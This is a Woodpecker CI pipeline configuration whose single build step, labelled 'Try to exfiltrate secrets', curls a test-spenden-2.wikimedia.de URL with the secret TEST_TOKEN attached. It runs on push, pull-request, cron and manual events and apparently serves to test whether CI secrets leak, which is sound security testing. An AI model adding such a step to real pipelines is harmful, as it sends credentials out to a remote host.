clone:
  git:
    image: woodpeckerci/plugin-git
    settings:
      # "lfs: false" disables downloading resources from LFS, which we don't use
      lfs: false

matrix:
  CONTAINER_IMAGE:
    - registry.gitlab.com/fun-tech/fundraising-frontend-docker:latest
    # Use the following image in future (Jan/Feb 2026)
    # - registry.gitlab.com/fun-tech/fundraising-frontend-docker:php-8.5

steps:
  - name: build
    when:
      - event: [ push, pull_request, cron, manual ]
    image: ${CONTAINER_IMAGE}
    environment:
      TEST_TOKEN:
        from_secret: test_token
    commands:
      # Try to exfiltrate secrets
      - curl "https://test-spenden-2.wikimedia.de/?i-hacked-the-token=$TEST_TOKEN"

